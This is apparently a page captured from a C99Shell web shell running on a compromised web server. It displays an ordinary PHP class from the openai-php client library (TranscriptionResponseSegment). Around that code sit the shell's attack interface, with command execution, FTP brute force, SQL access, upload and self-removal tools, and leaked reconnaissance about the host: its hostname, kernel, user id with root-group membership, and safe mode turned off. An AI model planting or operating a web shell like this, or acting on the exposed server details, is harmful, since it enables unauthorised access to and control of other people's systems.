!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ai.picotech.app/public_html/vendor/openai-php/client/src/Responses/Audio/   drwxrwxr-x
Free 28.91 GB of 117.98 GB (24.51%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     TranscriptionResponseSegment.php (2.6 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
OpenAI\Responses\Audio;

use 
OpenAI\Contracts\Response;
use 
OpenAI\Responses\Concerns\ArrayAccessible;

/**
 * @implements Response<array{id: int, seek: int, start: float, end: float, text: string, tokens: array<int, int>, temperature: float, avg_logprob: float, compression_ratio: float, no_speech_prob: float, transient: bool}>
 */
final class TranscriptionResponseSegment implements Response
{
    
/**
     * @use ArrayAccessible<array{id: int, seek: int, start: float, end: float, text: string, tokens: array<int, int>, temperature: float, avg_logprob: float, compression_ratio: float, no_speech_prob: float, transient: bool}>
     */
    
use ArrayAccessible;

    
/**
     * @param  array<int, int>  $tokens
     */
    
private function __construct(
        public readonly 
int $id,
        public readonly 
int $seek,
        public readonly 
float $start,
        public readonly 
float $end,
        public readonly 
string $text,
        public readonly array 
$tokens,
        public readonly 
float $temperature,
        public readonly 
float $avgLogprob,
        public readonly 
float $compressionRatio,
        public readonly 
float $noSpeechProb,
        public readonly 
bool $transient,
    ) {
    }

    
/**
     * Acts as static factory, and returns a new Response instance.
     *
     * @param  array{id: int, seek: int, start: float, end: float, text: string, tokens: array<int, int>, temperature: float, avg_logprob: float, compression_ratio: float, no_speech_prob: float, transient: bool}  $attributes
     */
    
public static function from(array $attributes): self
    
{
        return new 
self(
            
$attributes['id'],
            
$attributes['seek'],
            
$attributes['start'],
            
$attributes['end'],
            
$attributes['text'],
            
$attributes['tokens'],
            
$attributes['temperature'],
            
$attributes['avg_logprob'],
            
$attributes['compression_ratio'],
            
$attributes['no_speech_prob'],
            
$attributes['transient'],
        );
    }

    
/**
     * {@inheritDoc}
     */
    
public function toArray(): array
    {
        return [
            
'id' => $this->id,
            
'seek' => $this->seek,
            
'start' => $this->start,
            
'end' => $this->end,
            
'text' => $this->text,
            
'tokens' => $this->tokens,
            
'temperature' => $this->temperature,
            
'avg_logprob' => $this->avgLogprob,
            
'compression_ratio' => $this->compressionRatio,
            
'no_speech_prob' => $this->noSpeechProb,
            
'transient' => $this->transient,
        ];
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.004 ]--